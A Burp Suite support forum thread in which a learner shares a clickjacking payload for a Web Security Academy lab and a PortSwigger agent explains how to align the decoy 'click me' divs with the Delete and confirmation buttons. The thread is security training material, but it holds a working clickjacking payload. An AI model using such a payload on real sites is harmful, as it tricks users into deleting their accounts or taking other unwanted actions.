Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Issue in solving Multistep Clickjacking

kashish | Last updated: Jan 31, 2022 12:39PM UTC

values , as the 'click me' div elements line up with the buttons that need to be clicked but it's still not getting solved. Below is the code. Please help me on this. <style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.0001; z-index: 2; } .firstClick, .secondClick { position:absolute; top: 495px; left: 50px; z-index: 1; } .secondClick { top: 415px; left: 60px; } </style> <div class="firstClick">Click me first</div> <div class="secondClick">Click me next</div> <iframe src="https://acc51fcc1e4f7b9bc096a993003f00bd.web-security-academy.net/my-account"></iframe>

Ben, PortSwigger Agent | Last updated: Jan 31, 2022 06:48PM UTC

Hi, The issue is that the deletion process is multi-step process and you are lining up the two 'click me' elements against both the buttons on the first stage of the process. Instead you need to line up the first 'click me' element on the initial 'Delete' button (which you have in place) and then the second 'click me' element on the 'Yes' button that appears after you click the 'Delete' button to confirm you want the account to be deleted. If you use the 'View exploit' functionality within the Exploit Server then you should be able to see this process more clearly and adjust the values within your payload (the written solution provides a good guide on this if you are completely stuck).

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.